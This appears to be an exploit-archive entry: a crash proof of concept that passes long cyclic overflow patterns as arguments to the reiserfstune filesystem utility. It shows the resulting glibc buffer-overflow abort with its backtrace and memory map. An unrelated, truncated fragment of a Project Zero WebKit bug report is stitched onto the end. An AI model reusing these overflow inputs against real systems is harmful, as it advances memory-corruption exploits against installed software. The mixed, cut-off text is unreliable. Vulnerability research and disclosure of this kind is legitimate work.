'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2' '-l' 'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2' '-f' 'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2' '-c' 'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2' '-a' 'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2' '-C' 'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2' '-m' 'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2' '-a' 'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2' '-M' 'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2' '-V' 'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2'
- Out -
*** buffer overflow detected ***: /sbin/reiserfstune terminated
======= Backtrace: =========
/lib/x86_64-linux-gnu/libc.so.6(+0x70bcb)[0x7f00ba498bcb]
/lib/x86_64-linux-gnu/libc.so.6(__fortify_fail+0x37)[0x7f00ba521037]
/lib/x86_64-linux-gnu/libc.so.6(+0xf7170)[0x7f00ba51f170]
/lib/x86_64-linux-gnu/libc.so.6(+0xf6729)[0x7f00ba51e729]
/lib/x86_64-linux-gnu/libc.so.6(_IO_default_xsputn+0xac)[0x7f00ba49cbdc]
/lib/x86_64-linux-gnu/libc.so.6(_IO_vfprintf+0x1ebb)[0x7f00ba470bbb]
/lib/x86_64-linux-gnu/libc.so.6(__vsprintf_chk+0x8c)[0x7f00ba51e7bc]
/usr/lib/x86_64-linux-gnu/libreiserfscore.so.0(die+0xad)[0x7f00babebbfd]
/sbin/reiserfstune(+0x2f07)[0x561ea5aa7f07]
/sbin/reiserfstune(+0x1d9c)[0x561ea5aa6d9c]
/lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xf1)[0x7f00ba4482b1]
/sbin/reiserfstune(+0x2b2a)[0x561ea5aa7b2a]
======= Memory map: ========
561ea5aa5000-561ea5aaa000 r-xp 00000000 07:00 25966 /sbin/reiserfstune
561ea5ca9000-561ea5caa000 r--p 00004000 07:00 25966 /sbin/reiserfstune
561ea5caa000-561ea5cab000 rw-p 00005000 07:00 25966 /sbin/reiserfstune
561ea646d000-561ea648e000 rw-p 00000000 00:00 0 [heap]
7f00b9ff4000-7f00ba00a000 r-xp 00000000 07:00 10678 /lib/x86_64-linux-gnu/libgcc_s.so.1
7f00ba00a000-7f00ba209000 ---p 00016000 07:00 10678 /lib/x86_64-linux-gnu/libgcc_s.so.1
7f00ba209000-7f00ba20a000 r--p 00015000 07:00 10678 /lib/x86_64-linux-gnu/libgcc_s.so.1
7f00ba20a000-7f00ba20b000 rw-p 00016000 07:00 10678 /lib/x86_64-linux-gnu/libgcc_s.so.1
7f00ba20b000-7f00ba223000 r-xp 00000000 07:00 10771 /lib/x86_64-linux-gnu/libpthread-2.24.so
7f00ba223000-7f00ba422000 ---p 00018000 07:00 10771 /lib/x86_64-linux-gnu/libpthread-2.24.so
7f00ba422000-7f00ba423000 r--p 00017000 07:00 10771 /lib/x86_64-linux-gnu/libpthread-2.24.so
7f00ba423000-7f00ba424000 rw-p 00018000 07:00 10771 /lib/x86_64-linux-gnu/libpthread-2.24.so
7f00ba424000-7f00ba428000 rw-p 00000000 00:00 0
7f00ba428000-7f00ba5bd000 r-xp 00000000 07:00 10641 /lib/x86_64-linux-gnu/libc-2.24.so
7f00ba5bd000-7f00ba7bc000 ---p 00195000 07:00 10641 /lib/x86_64-linux-gnu/libc-2.24.so
7f00ba7bc000-7f00ba7c0000 r--p 00194000 07:00 10641 /lib/x86_64-linux-gnu/libc-2.24.so
7f00ba7c0000-7f00ba7c2000 rw-p 00198000 07:00 10641 /lib/x86_64-linux-gnu/libc-2.24.so
7f00ba7c2000-7f00ba7c6000 rw-p 00000000 00:00 0
7f00ba7c6000-7f00ba7ca000 r-xp 00000000 07:00 10812 /lib/x86_64-linux-gnu/libuuid.so.1.3.0
7f00ba7ca000-7f00ba9c9000 ---p 00004000 07:00 10812 /lib/x86_64-linux-gnu/libuuid.so.1.3.0
7f00ba9c9000-7f00ba9ca000 r--p 00003000 07:00 10812 /lib/x86_64-linux-gnu/libuuid.so.1.3.0
7f00ba9ca000-7f00ba9cb000 rw-p 00004000 07:00 10812 /lib/x86_64-linux-gnu/libuuid.so.1.3.0
7f00ba9cb000-7f00ba9ce000 r-xp 00000000 07:00 10650 /lib/x86_64-linux-gnu/libcom_err.so.2.1
7f00ba9ce000-7f00babcd000 ---p 00003000 07:00 10650 /lib/x86_64-linux-gnu/libcom_err.so.2.1
7f00babcd000-7f00babce000 r--p 00002000 07:00 10650 /lib/x86_64-linux-gnu/libcom_err.so.2.1
7f00babce000-7f00babcf000 rw-p 00003000 07:00 10650 /lib/x86_64-linux-gnu/libcom_err.so.2.1
7f00babcf000-7f00babf7000 r-xp 00000000 07:00 112033 /usr/lib/x86_64-linux-gnu/libreiserfscore.so.0.0.0
7f00babf7000-7f00badf6000 ---p 00028000 07:00 112033 /usr/lib/x86_64-linux-gnu/libreiserfscore.so.0.0.0
7f00badf6000-7f00badf7000 r--p 00027000 07:00 112033 /usr/lib/x86_64-linux-gnu/libreiserfscore.so.0.0.0
7f00badf7000-7f00badf8000 rw-p 00028000 07:00 112033 /usr/lib/x86_64-linux-gnu/libreiserfscore.so.0.0.0
7f00badf8000-7f00bae01000 rw-p 00000000 00:00 0
7f00bae01000-7f00bae24000 r-xp 00000000 07:00 10611 /lib/x86_64-linux-gnu/ld-2.24.so
7f00baff9000-7f00baffb000 rw-p 00000000 00:00 0
7f00bb020000-7f00bb024000 rw-p 00000000 00:00 0
7f00bb024000-7f00bb025000 r--p 00023000 07:00 10611 /lib/x86_64-linux-gnu/ld-2.24.so
7f00bb025000-7f00bb026000 rw-p 00024000 07:00 10611 /lib/x86_64-linux-gnu/ld-2.24.so
7f00bb026000-7f00bb027000 rw-p 00000000 00:00 0
7ffd3d63f000-7ffd3d664000 rw-p 00000000 00:00 0 [stack]
7ffd3d6bd000-7ffd3d6bf000 r--p 00000000 00:00 0 [vvar]
7ffd3d6bf000-7ffd3d6c1000 r-xp 00000000 00:00 0 [vdso]
ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall]
Aborted
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1187
Here's a snippet of Element::setAttributeNodeNS.
ExceptionOr<RefPtr<Attr>> Element::setAttributeNodeNS(Attr& attrNode)
{
...
